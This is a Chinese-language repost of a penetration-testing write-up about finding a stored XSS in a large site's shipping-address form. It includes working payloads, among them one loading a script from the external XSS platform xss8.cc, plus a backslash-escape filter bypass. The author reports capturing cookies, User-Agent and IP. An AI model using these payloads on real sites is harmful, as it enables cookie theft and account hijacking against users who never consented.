安基網 首頁 安全 滲透測試 查看內容

「滲透實例」記錄一次XSS滲透過程

2020-2-8 15:05| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 沒什么技巧,見到框就X,功夫不負有心人,在目標網站編輯收貨地址處發現了存在XSS的地方,沒想到這種大公司還會存在XSS。

0x01 找到存在XSS的位置

沒什么技巧,見到框就X,功夫不負有心人,在目標網站編輯收貨地址處發現了存在XSS的地方,沒想到這種大公司還會存在XSS。

使用的XSS代碼:<img src=1 onerror=alertxxx(1)>

0x02 構造XSS代碼連接到XSS平臺

XSS平臺給我們的XSS代碼是這樣的:

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>


直接插入的話會提示參數非法,經過多次嘗試,最后發現該平臺會對雙引號、script字符進行識別過濾,大小寫會被過濾,于是嘗試插入下面的語句:

</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>

這條代碼比上面平臺給的XSS代碼的多了幾個 “\”,也就是轉義字符,利用轉義字符可以繞過該平臺的策略,因為經驗不足,所以在這一步嘗試了很多種辦法都沒能繞過,要不有的可以插入但是連不上XSS平臺,要不有的就是被識別攔截。


加上轉義字符成功插入后,刷新目標網站與XSS平臺頁面,在XSS平臺就能看到剛才的訪問記錄。


這里可以獲取該登陸用戶的Cookie、User-Agent、IP地址什么的,但是觸發這個XSS需要登陸存在XSS的賬號才行,所以個人覺著知道了這個Cookie也沒啥用。
并且雖然知道這里存在XSS,但是觸發條件是需要知道用戶名和密碼,然后來到收貨地址頁面,所以個人感覺作用不大,因此在想這個漏洞還有沒有其他的利用價值,后續或許會繼續更新本次滲透過程,如果你有什么好的想法,歡迎下方留言。



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6790324931608445443/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
创业如何赚钱